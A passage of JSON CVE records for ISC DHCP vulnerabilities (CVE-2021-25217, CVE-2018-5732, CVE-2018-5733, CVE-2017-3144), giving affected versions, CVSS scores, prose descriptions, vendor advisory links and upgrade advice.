"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
},
{
"tags": [
"x_transferred"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"lessThan": "4.1-ESV-R16-P1",
"status": "affected",
"version": "4.1 ESV",
"versionType": "custom"
},
{
"lessThan": "4.4.2-P1",
"status": "affected",
"version": "4.4",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank Jon Franklin from Dell and Pawel Wieczorkiewicz from Amazon Web Services for (independently) reporting this vulnerability."
}
],
"datePublic": "2021-05-26T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "In ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2 (Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability), The outcome of encountering the defect while reading a lease that will trigger it varies, according to: the component being affected (i.e., dhclient or dhcpd) whether the package was built as a 32-bit or 64-bit binary whether the compiler flag -fstack-protection-strong was used when compiling In dhclient, ISC has not successfully reproduced the error on a 64-bit system. However, on a 32-bit system it is possible to cause dhclient to crash when reading an improper lease, which could cause network connectivity problems for an affected system due to the absence of a running DHCP client process. In dhcpd, when run in DHCPv4 or DHCPv6 mode: if the dhcpd server binary was built for a 32-bit architecture AND the -fstack-protection-strong flag was specified to the compiler, dhcpd may exit while parsing a lease file containing an objectionable lease, resulting in lack of service to clients. Additionally, the offending lease and the lease immediately following it in the lease database may be improperly deleted. if the dhcpd server binary was built for a 64-bit architecture OR if the -fstack-protection-strong compiler flag was NOT specified, the crash will not occur, but it is possible for the offending lease and the lease which immediately followed it to be improperly deleted."
}
],
"exploits": [
{
"lang": "en",
"value": "We are not aware of any active exploits."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Program code used by the ISC DHCP package to read and parse stored leases has a defect that can be exploited by an attacker to cause one of several undesirable outcomes, depending on the component attacked and the way in which it was compiled. Because of a discrepancy between the code which handles encapsulated option information in leases transmitted \"on the wire\" and the code which reads and parses lease information after it has been written to disk storage, it is potentially possible for an attacker to deliberately cause a situation where: dhcpd, while running in DHCPv4 or DHCPv6 mode, or dhclient, the ISC DHCP client implementation will attempt to read a stored lease that contains option information which will trigger a bug in the option parsing code. Affects ISC DHCP 4.1-ESV-R1 -\u003e 4.1-ESV-R16, ISC DHCP 4.4.0 -\u003e 4.4.2. Other branches of ISC DHCP (i.e., releases in the 4.0.x series or lower and releases in the 4.3.x series) are beyond their End-of-Life (EOL) and no longer supported by ISC. From inspection it is clear that the defect is also present in releases from those series, but they have not been officially tested for the vulnerability. Affects both dhcpd (server) and dhcpcd (client).",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-03T00:00:00.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"url": "https://kb.isc.org/docs/cve-2021-25217"
},
{
"name": "[oss-security] 20210526 ISC has disclosed a vulnerability in ISC DHCP (CVE-2021-25217)",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
},
{
"name": "FEDORA-2021-08cdb4dc34",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z2LB42JWIV4M4WDNXX5VGIP26FEYWKIF/"
},
{
"name": "[debian-lts-announce] 20210603 [SECURITY] [DLA 2674-1] isc-dhcp security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
},
{
"name": "FEDORA-2021-8ca8263bde",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5QI4DYC7J4BGHEW3NH4XHMWTHYC36UK4/"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
},
{
"url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
},
{
"name": "GLSA-202305-22",
"tags": [
"vendor-advisory"
],
"url": "https://security.gentoo.org/glsa/202305-22"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of ISC DHCP:\n\n ISC DHCP 4.1-ESV-R16-P1\n ISC DHCP 4.4.2-P1"
}
],
"source": {
"discovery": "USER"
},
"title": "A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient",
"workarounds": [
{
"lang": "en",
"value": "None known."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2021-25217",
"datePublished": "2021-05-26T22:10:11.312Z",
"dateReserved": "2021-01-15T00:00:00.000Z",
"dateUpdated": "2024-09-16T22:08:32.175Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-5732 (GCVE-0-2018-5732)
Vulnerability from nvd – Published: 2019-10-09 14:17 – Updated: 2024-09-16 18:19
VLAI?
Title
A specially constructed response from a malicious server can cause a buffer overflow in dhclient
Summary
Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0
Severity ?
7.5 (High)
CWE
- Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur.
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
Date Public ?
2018-02-28 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T05:40:51.169Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/docs/aa-01565"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
"version": "ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
}
],
"datePublic": "2018-02-28T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-09T14:17:14.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/docs/aa-01565"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of DHCP. ISC DHCP releases are available from https://www.isc.org/downloads.\n\n \u003e= DHCP 4.1-ESV-R15-P1\n \u003e= DHCP 4.3.6-P1\n \u003e= DHCP 4.4.1"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "A specially constructed response from a malicious server can cause a buffer overflow in dhclient",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-officer@isc.org",
"DATE_PUBLIC": "2018-02-28T00:00:00.000Z",
"ID": "CVE-2018-5732",
"STATE": "PUBLIC",
"TITLE": "A specially constructed response from a malicious server can cause a buffer overflow in dhclient"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ISC DHCP",
"version": {
"version_data": [
{
"version_name": "ISC DHCP",
"version_value": "4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
}
}
]
},
"vendor_name": "ISC"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Failure to properly bounds-check a buffer used for processing DHCP options allows a malicious server (or an entity masquerading as a server) to cause a buffer overflow (and resulting crash) in dhclient by sending a response containing a specially constructed options section. Affects ISC DHCP versions 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Affected versions of dhclient should crash due to an out-of-bounds memory access if they receive and process a triggering response packet. However, buffer overflow outcomes can vary by operating system, and outcomes such as remote code execution may be possible in some circumstances. Where they are present, operating system mitigation strategies such as address space layout randomization (ASLR) should make it difficult to leverage this vulnerability to achieve remote code execution, but we cannot rule it out as impossible. The safest course is to patch dhclient so that the buffer overflow cannot occur."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.isc.org/docs/aa-01565",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/docs/aa-01565"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of DHCP. ISC DHCP releases are available from https://www.isc.org/downloads.\n\n \u003e= DHCP 4.1-ESV-R15-P1\n \u003e= DHCP 4.3.6-P1\n \u003e= DHCP 4.4.1"
}
],
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2018-5732",
"datePublished": "2019-10-09T14:17:14.251Z",
"dateReserved": "2018-01-17T00:00:00.000Z",
"dateUpdated": "2024-09-16T18:19:36.136Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-5733 (GCVE-0-2018-5733)
Vulnerability from nvd – Published: 2019-01-16 20:00 – Updated: 2025-04-25 23:02
VLAI?
Title
A malicious client can overflow a reference counter in ISC dhcpd
Summary
A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -> 4.1-ESV-R15, 4.2.0 -> 4.2.8, 4.3.0 -> 4.3.6, 4.4.0.
Severity ?
5.9 (Medium)
CWE
- Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients.
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
Date Public ?
2018-02-28 00:00
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-04-25T23:02:52.084Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/docs/aa-01567"
},
{
"name": "RHSA-2018:0469",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0469"
},
{
"name": "DSA-4133",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "USN-3586-2",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "https://usn.ubuntu.com/3586-2/"
},
{
"name": "RHSA-2018:0483",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0483"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "103188",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/103188"
},
{
"name": "1040437",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1040437"
},
{
"name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20250425-0010/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
"version": "ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
}
],
"datePublic": "2018-02-28T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-01-17T10:57:01.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/docs/aa-01567"
},
{
"name": "RHSA-2018:0469",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0469"
},
{
"name": "DSA-4133",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "USN-3586-2",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "https://usn.ubuntu.com/3586-2/"
},
{
"name": "RHSA-2018:0483",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0483"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "103188",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/103188"
},
{
"name": "1040437",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1040437"
},
{
"name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of DHCP.\n\n DHCP 4.1-ESV-R15-P1\n DHCP 4.3.6-P1\n DHCP 4.4.1"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "A malicious client can overflow a reference counter in ISC dhcpd",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-officer@isc.org",
"DATE_PUBLIC": "2018-02-28T00:00:00.000Z",
"ID": "CVE-2018-5733",
"STATE": "PUBLIC",
"TITLE": "A malicious client can overflow a reference counter in ISC dhcpd"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ISC DHCP",
"version": {
"version_data": [
{
"version_name": "ISC DHCP",
"version_value": "4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0"
}
]
}
}
]
},
"vendor_name": "ISC"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "ISC would like to thank Felix Wilhelm, Google Security Team, for reporting this vulnerability."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A malicious client which is allowed to send very large amounts of traffic (billions of packets) to a DHCP server can eventually overflow a 32-bit reference counter, potentially causing dhcpd to crash. Affects ISC DHCP 4.1.0 -\u003e 4.1-ESV-R15, 4.2.0 -\u003e 4.2.8, 4.3.0 -\u003e 4.3.6, 4.4.0."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Successful exploitation of this vulnerability may exhaust the memory available to dhcpd and/or cause it to crash, resulting in a denial of service to clients."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.isc.org/docs/aa-01567",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/docs/aa-01567"
},
{
"name": "RHSA-2018:0469",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2018:0469"
},
{
"name": "DSA-4133",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "USN-3586-2",
"refsource": "UBUNTU",
"url": "https://usn.ubuntu.com/3586-2/"
},
{
"name": "RHSA-2018:0483",
"refsource": "REDHAT",
"url": "https://access.redhat.com/errata/RHSA-2018:0483"
},
{
"name": "USN-3586-1",
"refsource": "UBUNTU",
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"name": "103188",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/103188"
},
{
"name": "1040437",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1040437"
},
{
"name": "[debian-lts-announce] 20180322 [SECURITY] [DLA 1313-1] isc-dhcp security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00015.html"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to the patched release most closely related to your current version of DHCP.\n\n DHCP 4.1-ESV-R15-P1\n DHCP 4.3.6-P1\n DHCP 4.4.1"
}
],
"source": {
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"assignerShortName": "isc",
"cveId": "CVE-2018-5733",
"datePublished": "2019-01-16T20:00:00.000Z",
"dateReserved": "2018-01-17T00:00:00.000Z",
"dateUpdated": "2025-04-25T23:02:52.084Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-3144 (GCVE-0-2017-3144)
Vulnerability from nvd – Published: 2019-01-16 20:00 – Updated: 2024-09-16 22:46
VLAI?
Title
Failure to properly clean up closed OMAPI connections can exhaust available sockets
Summary
A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested.
Severity ?
5.3 (Medium)
CWE
- By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server. Once exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
Date Public ?
2018-01-16 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T14:16:28.230Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2018:0158",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0158"
},
{
"name": "DSA-4133",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "102726",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/102726"
},
{
"name": "1040194",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1040194"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/docs/aa-01541"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ISC DHCP",
"vendor": "ISC",
"versions": [
{
"status": "affected",
"version": "ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
}
]
}
],
"datePublic": "2018-01-16T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server.\n\nOnce exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-01-17T10:57:01.000Z",
"orgId": "404fd4d2-a609-4245-b543-2c944a302a22",
"shortName": "isc"
},
"references": [
{
"name": "RHSA-2018:0158",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2018:0158"
},
{
"name": "DSA-4133",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2018/dsa-4133"
},
{
"name": "102726",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/102726"
},
{
"name": "1040194",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1040194"
},
{
"name": "USN-3586-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "https://usn.ubuntu.com/3586-1/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/docs/aa-01541"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Failure to properly clean up closed OMAPI connections can exhaust available sockets",
"workarounds": [
{
"lang": "en",
"value": "The recommended remedy is to disallow access to the OMAPI control port from unauthorized clients (in accordance with best practices for server operation)."
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-officer@isc.org",
"DATE_PUBLIC": "2018-01-16T00:00:00.000Z",
"ID": "CVE-2017-3144",
"STATE": "PUBLIC",
"TITLE": "Failure to properly clean up closed OMAPI connections can exhaust available sockets"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ISC DHCP",
"version": {
"version_data": [
{
"version_name": "ISC DHCP",
"version_value": "4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
}
]
}
}
]
},
"vendor_name": "ISC"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability stemming from failure to properly clean up closed OMAPI connections can lead to exhaustion of the pool of socket descriptors available to the DHCP server. Affects ISC DHCP 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, 4.3.0 to 4.3.6. Older versions may also be affected but are well beyond their end-of-life (EOL). Releases prior to 4.1.0 have not been tested."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server.\n\nOnce exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "RHSA-2018:0158",
